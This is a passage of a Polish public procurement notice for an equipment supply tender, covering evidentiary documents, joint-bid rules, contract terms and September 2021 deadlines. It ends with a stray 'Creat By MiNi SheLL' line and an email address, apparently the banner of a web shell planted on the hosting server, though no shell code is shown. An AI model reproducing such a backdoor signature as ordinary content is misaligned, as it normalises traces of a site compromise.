dostawy<br/>zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne<br/>dokumenty sporządzone przez podmiot, na rzecz którego dostawy zostały wykonane, a jeżeli<br/>wykonawca z przyczyn niezależnych od niego nie jest wstanie uzyskać tych dokumentów –<br/>oświadczenie wykonawcy;<br/>Wykonawca, którego oferta zostanie najwyżej oceniona, zobowiązany jest do złożenia<br/>na wezwanie Zamawiającego podmiotowych środków dowodowych aktualnych na dzień ich złożenia.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> specyfikacje techniczne oferowanego sprzętu <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> specyfikacja oferowanego sprzętu<br/>1. Przedmiotowe środki dowodowe tj. specyfikacje techniczne oferowanego sprzętu<br/>WYKONAWCA SKŁADA WRAZ Z OFERTĄ.<br/>2. Jeżeli Wykonawca nie złożył przedmiotowych środków dowodowych lub złożone<br/>przedmiotowe środki dowodowe są niekompletne, Zamawiający wezwie do ich złożenia lub<br/>uzupełnienia w wyznaczonym terminie.<br/>3. Postanowienia pkt. 2 nie stosuje się, jeżeli przedmiotowy środek dowodowy służy<br/>potwierdzeniu zgodności z cechami lub kryteriami określonymi w opisie kryteriów oceny ofert lub,<br/>pomimo złożenia przedmiotowego środka dowodowego, oferta podlega odrzuceniu albo<br/>zachodzą przesłanki unieważnienia postępowania.<br/>4. Zamawiający może żądać od Wykonawców wyjaśnień dotyczących treści przedmiotowych<br/>środków dowodowych. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 11. Ofertę składa się na Formularzu ofertowym – zgodnie z załącznikiem nr 2 do SWZ oraz<br/>załącznikiem-wykazem zaoferowanego sprzętu.<br/>12. Wraz z ofertą (załącznik nr 2 do SWZzałącznik nr 2 do SWZ i Załącznik nr 1 do Formularza oferty) Wykonawca jest zobowiązany złożyć w formie<br/>elektronicznej (opatrzonej kwalifikowanym podpisem elektronicznym) lub w postaci<br/>elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym:<br/>1) oświadczenia, o których mowa w Rozdz. VIII ust. 1 SWZ (Załącznik nr 3 do SWZ),<br/>2) oświadczenia, o których mowa w Rozdz. IX ust. 8 SWZ (Załącznik nr 3a do SWZ) - (jeżeli<br/>dotyczy),<br/>3) zobowiązanie innego podmiotu, o którym mowa w Rozdz. IX ust. 3 SWZ (Załącznik nr 4 do<br/>SWZ) - (jeżeli dotyczy);<br/>4) odpowiednie dokumenty potwierdzające umocowanie do podpisania oferty lub<br/>pełnomocnictwa (jeżeli dotyczy);( z uwzględnieniem zapisów ust 16 – 17)<br/>5) oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia (art. 117 ust.<br/>4 Pzp) (Załącznik nr 6 do SWZ) – (jeżeli dotyczy<br/>6) przedmiotowe środki dowodowe - specyfikacja techniczna zawierająca opis zaoferowanego<br/>sprzętu <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> zgodnie z rozdziałem X SWZ<br/>1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku<br/>Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do<br/>reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno<br/>być załączone do oferty.<br/>2. Wszelka korespondencja będzie prowadzona przez Zamawiającego wyłącznie z<br/>pełnomocnikiem.<br/>3. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>oświadczenia,<br/>o których mowa w Rozdz. VIII ust. 1 SWZ, składa każdy z Wykonawców. Oświadczenia, których<br/>wzór stanowi Załącznik nr 3 do SWZ te potwierdzają brak podstaw wykluczenia oraz spełnianie<br/>warunków udziału w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków<br/>udziału w postępowaniu.<br/>4. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych<br/>lub doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia (konsorcjum,<br/>spółka cywilna) mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają<br/>dostawy/usługi, do realizacji których te zdolności są wymagane.<br/>5. W przypadku, o którym mowa w ww. ust. 4, Wykonawcy wspólnie ubiegający się o udzielenie<br/>zamówienia dołączają do oferty oświadczenie, z którego wynika, które dostawy/usługi wykonają<br/>poszczególni Wykonawcy, załączeniu załącznik nr 6 do SWZ<br/>6. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania<br/>składa każdy z Wykonawców wspólnie ubiegających się o zamówienie ( jeżeli dotyczy - na<br/>wezwanie). <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej<br/>oferty w zakresie uregulowanym w art. 454-455 p.z.p. oraz wskazanym w Istotnych<br/>Postanowieniach Umowy, stanowiącym Załącznik nr 1 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-09-03 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć poprzez Platformę https://powiat-olesnicki. ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-09-03 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-10-02</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Termin realizacji zamówienia wynosi: 5 tygodni od dnia zawarcia umowy<br/>(Termin dostawy stanowi kryterium oceny ofert i będzie wynikał z oferty Wykonawcy)

Creat By MiNi SheLL
Email: jattceo@gmail.com